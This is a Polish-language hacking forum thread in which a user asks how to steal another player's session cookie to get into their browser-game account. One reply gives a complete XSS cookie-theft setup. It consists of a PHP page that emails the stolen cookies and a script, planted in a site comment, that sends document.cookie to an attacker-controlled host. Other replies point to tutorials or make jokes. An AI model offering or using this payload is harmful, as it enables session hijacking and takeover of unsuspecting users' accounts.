jak ukraść komuś ciacho?

[maati1980]

Cel jest prosty.. chce wbić się na 10 sekund na konto gościa w jednej z wielu gier przeglądarkowych. TQM pisał, że są dodatki, ale chyba nie do końca zrozumiałem, albo nie potrafię znaleźć dodatku zwijającego komuś ciacho.

Jestem nobem jeśli chodzi o hacking, ale wiem już kilka rzeczy:
1. Wiem jak edytować ciacho w moim FF.
2. Sprawdzilem również masę dodatków do FF i wiem jak podmienić ciacho
3. Rozumiem filmik http://milw0rm.com/video/watch.php?id=30 (a przynajmniej tak mi się wydaje)

Szukam od kilku dni informacji na temat ataków XSS. Może ktoś mnie poprowadzi za rączkę (albo chociaż pałą między oczy zdzieli) żebym szukał w dobrym kierunku? Jak gościowi który siedzi przed przeglądarką i rypie w tą grę zwinąć SID
Z góry dzięki za pomoc.

[ryniek]

Skorzystaj z video-artów Unknowa z uw-team.org . Powinieneś umieć JavaScript oraz PHP, choć html'owe noobki też się bawią w XSS.

[GSG-9]

Zaopatrz sie w kominiarke ,pod przykryciem nocy mozesz buchnac komus ciacho!...g00gl3

[maati1980]

Dzięki za radę GSG.
Udalo się na prostym przykładzie. Teraz kolejny kłopot jak sprawdzić jakie filrty ma stronka z grą? jak sprawdzić w jaki sposób zmodyfikować składnię kodu tak aby działała na kontrotnej stronce?

[ryniek]

Dzięki za radę GSG.
Udalo się na prostym przykładzie. Teraz kolejny kłopot jak sprawdzić jakie filrty ma stronka z grą? jak sprawdzić w jaki sposób zmodyfikować składnię kodu tak aby działała na kontrotnej stronce?

musisz się dowiedzieć z czego owa stronka się składa. Jak jest zrobiona np. w JS+PHP+AJAX to musisz poszukać info w google na temat zabezpieczania portali poprzez skrypty JS+PHP+AJAX i filtrowanie przesyłanych danych za pomocą skryptów napisanych w tych językach. Ogólnie zainteresuj się JS'em AJAX'em i PHP; no i może jeszcze Flashem. No i o protokołach filtrowania danych na www Duuuużo teorii.

[Guzik1252]

Mozesz uzyc XSS =D tylko jest jeden warunek... ta strona musi byc na nia podatna.. =D
Do rzeczy =D
Robisz sobie serwer swoj wlasny np. w serwisie 110mb.com.
robisz plik tekstowy ktory nazywasz cookie.php
w nim ma sie znajdowac taki kod:

Kod:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Błąd</title>
<style type="text/css">
<!--
body,td,th {
   color: #FFFFFF;
}
body {
   background-color: #000000;
}
-->
</style></head>
<? mail('[email protected]', 'Ciacha skradzione', $cookies); ?>
<body>
<h2><strong>Błąd</strong> - <strong>Brak dostępu</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>

a na stronke np. w komentarzu czy cos takiego wklepujesz taki kod:

Kod:

<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>

www.HaX0r.com to oczywiscie serwer czy strona zalozona przez ciebie =D
i to wszystko =D

[Fir3]

wchodzisz do cukierni, mówisz ze to napad i że chcesz im ukraść ciacho, spytaj czy maja ciastka korzenne to są tzw root cookies czyli ciasteczka roota, dzięki nim przejmiesz calą siec cukierni.